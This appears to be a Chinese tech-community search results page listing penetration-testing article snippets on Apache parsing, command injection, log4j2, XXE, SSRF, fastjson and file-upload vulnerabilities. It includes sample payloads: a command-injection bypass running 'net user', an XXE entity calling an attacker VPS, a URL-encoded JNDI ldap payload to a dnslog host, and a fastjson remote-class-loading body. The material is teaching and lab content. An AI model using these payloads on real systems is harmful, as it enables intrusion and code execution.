首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏渗透测试专栏

    渗透测试文件上传漏洞原理与验证(4)——Apache文件解析漏洞

    Apache 文件解析介绍Apache文件解析漏洞与用户的配置有密切关系。严格来说,属于用户配置问题,这里要讲解配置出错的原因以及修复方法,所以需要准备漏洞复现环境。使用ubuntu的docker。 |t|tml)$也就是说(php|php3|php4|php5|php7|pht|phtml)是文件的最后一个后缀,则把文件交给php处理器(php_module)来处理,处理完之后结果返回给apache Apache 文件解析漏洞Apache文件解析漏洞涉及到一个解析文件的特性:Apache默认一个文件可以有多个以点分隔的后缀,当右边的后缀无法识别(不在mime.types内),则继续向左识别。 其实,apache本身根本不存在所谓的解析漏洞我们回顾一下请求的过程:当我们请求这样一个文件:shel.php.xxx.yyyyyy->无法识别,向左xxx->无法识别,向左php->发现后缀是php, 交给php处理这个文件最后一步虽然交给了php来处理这个文件,但是php也不认识.aaa的后缀啊,所以就直接输出了其实,解析漏洞的产生,是由于运维人员在配置服务器时,为了使apache服务器能解析php

    1K20编辑于 2024-11-26
  • 来自专栏渗透测试专栏

    渗透测试命令执行漏洞原理与验证(4)——命令执行漏洞及防御

    Command Injection-High黑名单看似过滤了所有的非法字符,但是把" | "(空格在后)替换为空字符,于是 可以用" | "(空格在前)绕过127.0.0.1 |net user命令执行漏洞防御尽量不要执行外部命令使用自定义函数或函数库来替代外部命令的功能使用

    47810编辑于 2024-11-17
  • 来自专栏For XX - 专注于技术本身

    log4j2漏洞原理及修复方案

    在Java技术栈中,用的比较多的日志输出框架主要是log4j2和logback,ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 相信大家这两天应该被这么一条新闻刷屏了:Log4j爆核弹级漏洞,Flink、Kafka、ES等多个开源项目及多个上市公司项目受到影响 这个漏洞到底是怎么回事? 漏洞原理 假如某一个Java程序中,将浏览器的类型记录到了日志中: String userAgent = request.getHeader("User-Agent"); logger.info(userAgent 影响规模 这一次漏洞的影响面之所以如此之大,主要还是log4j2的使用面实在是太广了。 修复方案 目前新版的log4j2已经修复了这个问题,将版本升级到2.16.0即可 参考文章:https://mp.weixin.qq.com/s/GjpniNP4kMK8yCdZ2IG5pw

    2.5K20编辑于 2022-06-10
  • 来自专栏渗透测试专栏

    渗透测试逻辑漏洞原理与验证(4)——权限控制问题

    目前存在未授权访问漏洞主要存在Web应用权限中。 可以执行java命令 printIn"ls".execute().text,调用函数执行系统命令,可以看到回显了当前目录下的文件信息,该漏洞属于未授权访问,同时也属于命令执行漏洞。 水平越权原理水平越权原理为用户A与用户B都属于同一个角色X,但用户A与用户B都各自拥有些私有数据,正常情况下,只有用户自己才能访问自己的私有数据,但在RBAC模型下系统只会验证用户A是否属于角色X,而不会判断用户 水平越权也可以把其称作访问控制攻击漏洞。 垂直越权原理垂直越权原理为高权限角色访问低权限角色的资源往往是被允许的,低权限角色访问高权限角色资源是被禁止的,如果低权限角色通过访问URL、修改标识、遍历参数等方法获得了更高权限角色的能力,这样就发生了垂直越权访问

    68910编辑于 2024-12-12
  • 来自专栏渗透测试专栏

    渗透测试XSS漏洞原理与验证(4)——HTTP协议安全

    Session利用的实质:由于SessionlD是用户登录之后持有的唯一认证凭证,因此黑客不需要再攻击登陆过程(比如密码),就可以轻易获取访问权限,无需登录密码直接进入特定用户界面,进而查找其他漏洞如XSS 4、HTTP的连接很简单,是无状态的;HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,比HTTP协议安全。 SSL协议组成1、记录协议(Record Protocol)2、握手协议(Handshake Protocol)3、警告协议(Alert Protocol)4、密码规范改变协议(Change Cipher

    35210编辑于 2024-11-05
  • 来自专栏全栈程序员必看

    XXE漏洞原理

    XXE漏洞是XML外部实体注入漏洞,那什么是外部实体呢? ---- XML DTD 1、文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 Ps:第二条是重点,也是XXE漏洞产生的原因,DTD可以定义外部实体并引用 DTD语法 若DTD要在XML文档中使用,他需要包含在·DOCTYPE声明中 语法 <! etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False)) 白名单过滤 ---- 判断是否存在XXE漏洞 ENTITY playwin SYSTEM "http://yourvps/xx.txt"> ]> <root>&playwin;</root> 解析成功,说明有XXE漏洞

    97320编辑于 2022-08-25
  • 来自专栏渗透测试专栏

    渗透测试SQL注入漏洞原理与验证(4)——SQL盲注

    在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

    2.1K10编辑于 2024-09-27
  • 来自专栏红队蓝军

    log4j远程代码执行漏洞原理详解及复现

    总结:{}中的value可以是一个链接 log4j2漏洞 什么是log4j2 log4j是开源的日志记录框架,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时 ,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。 漏洞原理 log4j2 在日志输出中,一旦在log字符串中检测到${},就会调用lookup查询尝试解析其中的字符串,如果未对字符合法性进行严格的限制,攻击者构造恶意的URL地址让其解析,利用 JNDI log4j2漏洞复现 攻击机:kali 靶机:kali 中使用docker 创建log4j2容器 在docker中搭建靶场 拉取靶场镜像:docker pull vulfocus/log4j2-rce 、对URL进行编码处理 4、访问 此时的payload为URL编码后的 %24%7Bjndi%3Aldap%3A%2F%2Flvngwx.dnslog.cn%7D 数据被外带出来证明log4j2存在漏洞

    4.8K10编辑于 2024-08-01
  • 来自专栏网络安全攻防

    RFD漏洞原理浅析

    基本介绍 RFD(Reflected File Download)即反射型文件下载漏洞,2014年在BlackHat中被提出,该漏洞原理上类似XSS,在危害上类似DDE,攻击者可以通过一个URL地址使用户下载一个恶意文件 ,从而危害用户的终端PC,不过这个漏洞很罕见,大多数公司会认为它是一个需要结合社工的低危漏洞,但微软,雅虎,eBay,PayPal和其他许多公司认为这是一个中危漏洞 漏洞原理 下面从一个实例理解RDF漏洞 根据漏洞触发的三个条件挖掘漏洞: 输入反射:用户输入被"反射"到响应内容 文件名可控:URL允许接受用户的其他输入,攻击者将其用于把文件扩展名设置为可执行扩展名 诱导下载操作:响应被作为文件里内容进行下载 11中命中JSON/JSONP API URL,我们可以看到响应将以somefileName.json的形式下载,文件名主要取决于http Content-Disposition标头和URL,而要利用此漏洞 ;setup.bat get_user_profile/setup.bat get_user_profile;/setup.bat get_user_profile;/setup.bat; Step 4

    58210编辑于 2024-04-28
  • 来自专栏人工智能机器学习

    推荐给运维人员4个常见的系统组件漏洞原理

    我们需要全面运维过程中的基础服务常见漏洞和Web server常见漏洞以及运维工具常见漏洞等安全风险,并深入探讨运维安全意识相关的思路方法,防患于未然。 系统组件常见漏洞原理包含以下4个: 1、Web server常见漏洞 2、基础服务常见漏洞 3、运维工具常见漏洞 4、运维安全意识相关 190655fe49fe487278.jpg 在这里,详细介绍一下 Web server常见漏洞原理包含以下8种: 1、物理路径泄露 物理路径泄露一般是由于Web服务器处理用户请求出错导致的,如通过提交一个超长的请求,或者是某个精心构造的特殊请求,或是请求一个Web服务器上不存在的文件 4、缓冲区溢出 缓冲区溢出漏洞想必大家都很熟悉,无非是Web服务器没有对用户提交的超长请求没有进行合适的处理,这种请求可能包括超长URL,超长HTTP Header域,或者是其它超长的数据。 以上内容参考《系统组件常见漏洞原理》(安全牛课堂)

    1.1K00发布于 2019-07-15
  • 来自专栏ops技术分享

    redis原理4

    十条数据,算出各自的哈希值,(这里就不变了,实际上要经过一系列计算) 0 : 0 1 : 1 2 : 2 3 : 3 4 : 4 5 : 5 6 : 6 7 : 7 8 : 8 9 : 9 有三个节点, 算出各自的哈希值 node a: 3 node b: 5 node c: 7 这个时候比较两者的哈希值,5等于b,则归属b,4小于b,归属b,3等于a,则归属a,最后所有大于c的,归属于c(这里只是模拟 ) 相当于整个哈希值就是一个环,对应的映射结果: node a: 0,1,2,3 node b: 4,5 node c: 6,7,8,9 这个时候加入node d, 就可以算出node d的哈希值: node d: 9 这个时候对应的数据就会做迁移: node a: 0,1,2,3 node b: 4,5 node c: 6,7 node d: 8,9 只有最后8,9这2条数据被存储到新的节点,其他不变

    35300发布于 2021-05-18
  • 来自专栏全栈程序员必看

    SSRF漏洞原理解析

    文章目录 0x01 基础知识 1、SSRF漏洞简介: 2、主要攻击方式: 3、漏洞形成原理4漏洞的危害: 0x02 漏洞检测 1、漏洞验证: 2、漏洞的可能出现点: 0x03 绕过方法: 1、绕过限制为某种域名 url=gopher://127.0.0.1:2233/_test (向2233端口发送数据test,同样可以发送POST请求) ... 3、漏洞形成原理: 很多网站提供了从其他的服务器上获取数据的功能 4漏洞的危害: 对外网、服务器所在内网、本地进行端口扫描 向内部任意主机的任意端口发送payload来攻击内网服务 DOS攻击(请求大文件,始终保持连接Keep-Alive Always 2、绕过限制请求IP不为内网地址: (1)采用短网址绕过 (2)利用特殊域名,xip.io可以指向任意域名(原理是DNS解析),即 127.0.0.1.xip.io,可以解析为127.0.0.1 (3) 4、统一错误信息,避免用户可以根据错误信息来判断远程服务器的端口状态。 5、对请求地址设置白名单或者限制内网IP,以防止对内网进行攻击。

    12K37编辑于 2022-09-12
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-4

    2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中包含XSS,SQL注入,文件上传,文件包含,CSRF和暴力破解等各个难度的测试环境。 2.将DVWA重命名为dvwa并移动到htdocs Windows用户直接将文件拖到www即可(系统状态栏左下角) image.png 3.配置如上 注意:打开全局权限和用户账户数据库中的两个服务 4.

    64020编辑于 2022-03-18
  • 来自专栏漏洞知识库

    SSRF漏洞原理与利用

    漏洞知识库 网络安全/渗透测试/代码审计/ 关注 SSRF漏洞原理与利用 什么是SSRF? 内外网的端口和服务探测 主机本地敏感数据的读取 内外网主机应用程序漏洞的利用 …… 等等 怎么找到SSRF漏洞? 能够对外发起网络请求的地方,就可能存在SSRF漏洞 从远程服务器请求资源(Upload from URL,Import & Export RSS feed) 数据库内置功能(Oracle、MongoDB > SSRF漏洞的利用 访问URL: http://127.0.0.1/web/ssrf.php?url=www.baidu.com ? 912、902、3306端口 80:HTTP 8080:代理服务器端口(因为打开了BurpSuite) 912:虚拟机监听端口 902:Vmware使用的端口 3306:Mysql服务默认端口 SSRF漏洞修复建议

    2K20发布于 2019-11-20
  • fastjson漏洞原理与复现

    然后通过@type指定的内容来选择反序列化使用到的链为哪一条,那么我们通过此特性通过指定datasourcename参数为我们的恶意class类,从而导致命令执行 fastjson 1.2.24-rce漏洞复现 环境地址 https://github.com/vulhub/vulhub 启动环境 docker-compose up -d 漏洞复现 写入如下代码进入java文件保存为rce.java文件 import 192.168.13.106:9999/rce", "autoCommit":true } ​ } 如下图成功访问本地的rce.class文件 本地已执行命令 fastjson 1.2.47-rce漏洞复现 描述 该漏洞为1.2.24白名单限制,可绕过白名单限制进行命令执行(与1.2.24原理相同) 环境地址 https://github.com/vulhub/vulhub 启动环境 docker-compose up -d 漏洞复现 此漏洞复现方式与fastjson 1.2.24相似,所以我们直接给出payload,连marshalsec项目监听的服务和python监听的class文件的服务都不需要做任何更改

    68720编辑于 2024-03-23
  • 来自专栏全栈程序员必看

    xxe漏洞原理与防御

    xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。 4,PCDATA PCDATA 的意思是被解析的字符数据(parsed character data)。 PCDATA 是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。 4,产生哪些危害? XXE危害4:攻击内网网站 该CASE是攻击内网struts2网站,远程执行系统命令。

    1.1K10编辑于 2022-08-31
  • 来自专栏IT技术(谌启梁)

    csrf漏洞原理及防御

    攻击原理 csrf.png 从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤 1.登录受信任网站A,并在本地生成Cookie 2.在不登出A的情况下,访问危险网站B 防御原理 csrf chapter=4_3

    2.2K00发布于 2019-08-27
  • 来自专栏网络信息安全

    漏洞复现】Apache Log4j 漏洞利用分析

    Apache Log4j 漏洞利用分析 Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了 ,复现漏洞来学习一下,希望可以帮助到大家。 _221 三、 漏洞分析 测试代码如下: #log4j,java import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger log4j 中 jdni 的用法格式如下: ${jndi:JNDIContent} 既然明确了lookup是触发漏洞的点,并且找到了可以触发 lookup的方法 ,那么就可以找入口点,只要找到入口点,然后传入 只有当当前事件的日志等级大于等于设置的日志等级时,才会符合条件,进入logMessage()方法 由于这些调用方法触发漏洞原理都是一样的,所以本文就以 error 举例说明。

    1.1K10编辑于 2024-03-12
  • 走进“乌云”教科书书里的漏洞4)【充值舍入漏洞

    0x01 漏洞解析舍入漏洞是财务、支付、电商等涉及金额计算的系统中,因对小数金额的舍入规则设计不当或计算逻辑不统一,导致实际金额与预期金额产生偏差,进而被攻击者利用获取非法利益的业务逻辑漏洞。 其核心成因是不同系统模块(如订单计算、支付对账、退款结算)采用不一致的舍入方式,或未对舍入后的金额进行二次校验,形成金额差漏洞。 100 元订单拆分为 100 笔 1 元订单),利用每笔订单舍入产生的 0.01 元差额,通过批量操作获取非法收益;或在退款场景中,利用舍入差异使实际退款金额高于原支付金额,实现 “薅羊毛”0x02 漏洞复现本次使用靶场连接 在数据包里有提示:输入0.018,成功获取flag0x03 漏洞修复方法修复需围绕 “后端主导校验、拒绝信任前端数据” 核心原则,从数据校验、逻辑设计、监控审计三方面入手:后端强制重算金额:后端接收订单请求后

    43910编辑于 2025-08-25
  • 来自专栏山丘安全攻防实验室

    漏洞复现|文件上传漏洞利用方式与原理概述

    phpstudy下载地址:http://phpstudy.php.cn pikachu靶场下载地址:https://github.com/zhuifengshaonianhanlu/pikachu 文件上传漏洞 : 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。

    2.1K20发布于 2020-03-06
领券